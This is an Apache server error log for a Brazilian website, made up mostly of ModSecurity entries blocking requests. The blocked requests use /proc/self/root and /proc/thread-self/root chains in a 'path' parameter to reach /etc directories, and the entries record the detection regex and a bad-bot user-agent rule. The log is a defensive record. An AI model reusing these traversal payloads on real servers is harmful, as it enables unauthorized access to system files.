[Wed Mar 18 08:12:24.614947 2026] [:error] [pid 17653:tid 140411540502272] [client 74.7.243.128:52144] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqImMdf6f5d65gmYZS5SgAAAtg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:12:30.469839 2026] [mime_magic:error] [pid 11816:tid 140411607643904] (70014)End of file found: [client 57.141.18.104:36308] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 08:12:58.601317 2026] [:error] [pid 30077:tid 140411540502272] [client 74.7.244.43:37230] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqIuvu8EFLIOrSqIpvq4wAAAlg"]
[Wed Mar 18 08:12:59.426808 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.228.61:37594] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqIu8df6f5d65gmYZS5YQAAAs4"]
[Wed Mar 18 08:13:11.645802 2026] [mime_magic:error] [pid 31803:tid 140411725141760] (70014)End of file found: [client 216.73.216.191:37746] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 08:13:30.987118 2026] [:error] [pid 15051:tid 140411708356352] [client 74.7.241.31:44442] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqI2imAPhZkrhU8w4lTGQAAAIQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:13:56.898866 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.241.31:42604] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqI9Na6ubjKNq_cu4Z9cQAAA0I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:14:04.003382 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.243.128:55086] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqI-wkwaGbbGflqUZD2oAAAAMM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:14:12.020024 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.243.128:60846] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqJA_u8EFLIOrSqIpvrGgAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:14:17.211383 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.243.128:49808] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqJCeyqAr6etmhZHNqi8wAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:14:28.681775 2026] [mime_magic:error] [pid 26799:tid 140411548894976] (70014)End of file found: [client 57.141.18.70:40516] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 08:15:46.019125 2026] [:error] [pid 29882:tid 140411574073088] [client 74.7.241.31:47674] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqJYkzinOy1jxa1j4f4zAAAARQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:15:53.673791 2026] [mime_magic:error] [pid 15051:tid 140411624429312] (70014)End of file found: [client 216.73.216.191:43306] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 08:16:39.397185 2026] [mime_magic:error] [pid 29882:tid 140411691570944] (70014)End of file found: [client 74.7.243.128:49824] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/sys/fs/cgroup/systemd
[Wed Mar 18 08:17:05.687458 2026] [mime_magic:error] [pid 15826:tid 140411624429312] (70014)End of file found: [client 57.141.18.119:45912] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 08:17:06.770784 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.241.31:42974] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqJsuoXxyEfFpUF8f9VVwAAAU0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:17:26.698837 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.243.128:53790] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqJxgkwaGbbGflqUZD3EgAAANU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:17:28.058842 2026] [:error] [pid 15051:tid 140411741927168] [client 74.7.241.31:38076] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqJyCmAPhZkrhU8w4lT8wAAAIA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:17:47.813753 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.243.128:53802] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqJ29Y0UrI5A3LftIyFewAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:17:50.699569 2026] [:error] [pid 15051:tid 140411691570944] [client 74.7.241.31:57072] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqJ3imAPhZkrhU8w4lUGAAAAIY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:17:51.461979 2026] [:error] [pid 31803:tid 140411599251200] [client 74.7.243.128:56606] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqJ3-yqAr6etmhZHNqjigAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:17:54.272879 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.241.31:41676] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqJ4ta6ubjKNq_cu4Z-HgAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:17:58.314334 2026] [:error] [pid 29882:tid 140411666392832] [client 74.7.244.43:47154] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqJ5kzinOy1jxa1j4f5gwAAAQk"]
[Wed Mar 18 08:18:02.624319 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.228.61:54728] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqJ6uoXxyEfFpUF8f9VeQAAAUs"]
[Wed Mar 18 08:18:14.329313 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.243.128:44980] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqJ9ta6ubjKNq_cu4Z-RAAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:18:34.071321 2026] [:error] [pid 31803:tid 140411666392832] [client 74.7.241.31:41688] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqKCuyqAr6etmhZHNqjsgAAAEk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:18:50.340068 2026] [:error] [pid 11816:tid 140411624429312] [client 74.7.243.128:41782] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqKGuw_le52K8_3pV3G_AAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:18:51.704105 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.243.128:47224] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqKG-yqAr6etmhZHNqjtwAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:18:52.991602 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.243.128:47232] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqKHOyqAr6etmhZHNqjuQAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
